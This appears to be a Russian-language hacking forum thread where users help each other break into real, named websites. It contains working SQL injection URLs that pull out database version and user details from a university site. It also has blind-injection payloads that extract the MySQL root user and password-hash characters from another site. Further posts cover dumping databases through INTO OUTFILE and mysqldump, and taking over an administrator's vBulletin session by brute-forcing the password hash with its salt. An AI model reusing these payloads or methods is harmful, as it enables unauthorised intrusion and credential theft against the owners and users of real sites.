pinky07, зачем усложнять жизнь подзапросами??? это крайняя мера, так как долго и нудно! Этот сайт вообще одна большая скуль =))) каждый параметр и стоило еще чуть посмотреть и вот он Code: http://www.christuniversity.in/display_article.php?fid=20&arid=13+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7/* 4.1.22 christco_christ@localhost christ_university
Всем привет!! Вот нашел чтото непонятное на одном сайте соединенном с базой www.uro.net.ua/ - www.uro.net.ua/phpmyadmin/ Вот ошибка www.uro.net.ua/index.php?act=idx&st=-5 - Раскрутить не удается,вообще нивкакую нехочет!!!
Code: SELECT post_id,title,date FROM eA_cp.mainnews ORDER by date DESC LIMIT -5,5 Инъекция в limit после order by. ничего не сделаешь тут.
В общем есть такой скриптик, там можно управлять базой, но тока при помощи команд, это не пхпмайадмин.. Просто вводиш команду и тебя слушается база... Вот такой вопрос, как сделать через команду sql чтобы сделать бэкап базы? К примеру сделать бэкап базы в /www/files Очень нужно, прошу помочь, с меня +
Скажу сразу, там кароче любые команды идут sql, не знаю логина и пароль админа, но пробовал select from.. всё идёт! Что подскажете?
делал бэкап дб таким способом: mysqldump -utracker -ptester. --all-databases > /www/tracker/stats/fuckme.sql Выбило: Shell command: mysqldump -utracker -paaa67&1!a. --all-databases > /www/tracker/stats/fuckme.sql Usage: mysqldump [OPTIONS] database [tables] OR mysqldump [OPTIONS] --databases [OPTIONS] DB1 [DB2 DB3...] OR mysqldump [OPTIONS] --all-databases [OPTIONS] For more options, use mysqldump --help Что не так ?
Смотря что за субд. В мускуле делается так: select * from jops where name='12' into outfile '/www/files/dump.txt' или into dumpfile
-utracker -ptester. -А чего это такое? mysqldump --all-databases > all_databases.sql - Так мне кажется проще...
Здравствуйте уважаемые пользователи antichat. У меня к вам вопрос. Точнее ситуация, надеюсь, вы поможете мне ее разрешить, т. к ранее я с cookies не сталкивался. Вообщем есть сайт назовем его “x”. На его форуме движок, которого vBulletin v3.5.4. Я имею логин администратора и его пароль в зашифровки (извлек из базы). Так вот как мне подставить cookies? Я понимаю, что это делать надо, наверное, через Opera, но, сколько не пытался, не получалось. Помогите, пожалуйста. Заранее огромное спасибо!
поставь себе денвер, поставь туда булку. и снифай через привокси или аналогичную программу запросы. потом аналогично проделай на нужном тебе сайте.
лучше извлеки из БД ещё и соль и пробрути хеш. По кукам просто в админку не войдёшь - там повторная авторизация
ку всем моя первая инъекция: Code: http://www.mega-porno.ru/signup.php/data:text/index.php?category=1' не могу подобрать поля, может кто подскажет че да как?!?!?!
http://www.mega-porno.ru/signup.php/data:text/index.php?category=1')+and+(select+1)=1+and+(banners.cat_link.cat_id='1 Чтоб интересней было
MyTHblu, http://www.mega-porno.ru/signup.php/data:text/index.php?category=1')+and+ascii(substring((select+user+from+mysql.user+limit+0,1),4,1))=116+--+ user - root http://www.mega-porno.ru/signup.php/data:text/index.php?category=1')+and+ascii(substring((select+password+from+mysql.user+limit+0,1),4,1))>=10+--+ а хеш сам )
Нет Это не тот слу4ай... Просто видимо админ сам сделал, 4тобы перекидывало на гугл В общем попасть у меня туда никак не полу4иться 4толь??
а с чего ты взял, что он там установлен. Наверное его там попросту нет, сервер возвращает 404, а админ сделал в этом случае редирект =)
Имхо,если пхп май админа там нету, то и редирикт на гугл бы не ставили...зайди в раздел обзор уязвимостей в пхп май админ там есть список вероятных расположений... поперебирай их...
